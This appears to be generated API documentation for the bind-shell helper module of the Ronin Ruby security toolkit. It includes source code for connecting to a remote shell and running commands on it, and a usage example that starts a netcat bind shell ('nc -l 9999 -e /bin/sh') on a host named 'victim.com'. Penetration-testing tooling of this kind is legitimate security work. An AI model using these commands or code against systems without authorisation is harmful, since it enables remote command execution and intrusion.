Module: Ronin::Payloads::Helpers::BindShell

Includes:
Shell
Defined in:
lib/ronin/payloads/helpers/bind_shell.rb

Overview

A Payload helper for communicating with TCP/UDP bind-shells.

Example

ronin_payload do

  helper :bind_shell

  cache do
    # ...
  end

end

Usage

On the remote host start the bind-shell. The easiest way is using the netcat utility; assuming you can execute commands.

$ nc -l 9999 -e /bin/sh

Configure the payload:

payload.host = 'victim.com'
payload.port = 9999

Then access the bind-shell.

payload.shell.ls
# => "Documents  Music\t   Public  Templates\nDesktop
Downloads  Pictures  src\t   Videos\n"

Class Method Summary collapse

Instance Method Summary collapse

Methods included from Shell

#fs_chdir, #fs_chgrp, #fs_chmod, #fs_chown, #fs_copy, #fs_getcwd, #fs_glob, #fs_mkdir, #fs_mktemp, #fs_move, #fs_read, #fs_readdir, #fs_rmdir, #fs_stat, #fs_unlink, #fs_write, #process_exit, #process_getenv, #process_getgid, #process_getuid, #process_kill, #process_setenv, #process_spawn, #process_time, #process_unsetenv

Class Method Details

.extended(base) ⇒ Object 


68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
 
# File 'lib/ronin/payloads/helpers/bind_shell.rb', line 68

def self.extended(base)
  base.instance_eval do
    # The host the bind-shell is running on
    parameter :host, type: String,
                     description: 'Host to connect to'

    # The port the bind-shell is listening on
    parameter :port, type: Integer,
                     description: 'Port to connect to'

    # The protocol to use (tcp/udp)
    parameter :protocol, default: :tcp,
                         description: 'Protocol to connect with'

    test_set :host
    test_set :port
    test_in :protocol, [:tcp, :udp]

    deploy do
      socket = case self.protocol
               when :tcp
                 TCPSocket
               when :udp
                 UDPSocket
               end

      @bind_shell = socket.new(self.host,self.port)
    end

    evacuate do
      @bind_shell.close if (@bind_shell && !(@bind_shell.closed?))
      @bind_shell = nil
    end
  end
end

Instance Method Details

#shell_exec(program, *arguments) {|line| ... } ⇒ Object

Send a command to the bind-shell and process the output.

Parameters:

  • program (String)

    The program to run remotely.

  • arguments (Array<String>)

    Additional arguments for the program.

Yields:

  • (line)

    Each line of output received from the bind-shell will be yielded.

Yield Parameters:

  • line (String)

    A line of output from the shell.

Since:

  • 1.0.0


122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
 
# File 'lib/ronin/payloads/helpers/bind_shell.rb', line 122

def shell_exec(program,*arguments)
  command = ([program] + arguments).join(' ')
  
  # generate a random nonce for the command deliminators
  nonce = (rand(1_000_000) + 10_000_000)

  start = Digest::MD5.hexdigest(nonce.to_s)
  stop  = Digest::MD5.hexdigest((nonce + 1).to_s)

  print_debug "[#{self.host}:#{self.port}] Sending command: #{command}"

  # send the command
  @bind_shell.puts("echo #{start}; (#{command}); echo #{stop}")

  # read any excess output
  @bind_shell.each_line do |line|
    break if line.chomp == start
  end

  @bind_shell.each_line do |line|
    line.chomp!

    # EOS reached
    break if line == stop

    print_debug "[#{self.host}:#{self.port}]   #{line.dump}"
    yield line
  end

  print_debug "[#{self.host}:#{self.port}] Command finished: #{command}"
end

#shell_write(data) ⇒ Integer

Writes data to the bind shell.

Parameters:

  • data (String)

    The data to write.

Returns:

  • (Integer)

    The number of bytes writen.

Since:

  • 1.0.0


165
166
167
 
# File 'lib/ronin/payloads/helpers/bind_shell.rb', line 165

def shell_write(data)
  @bind_shell.write(data)
end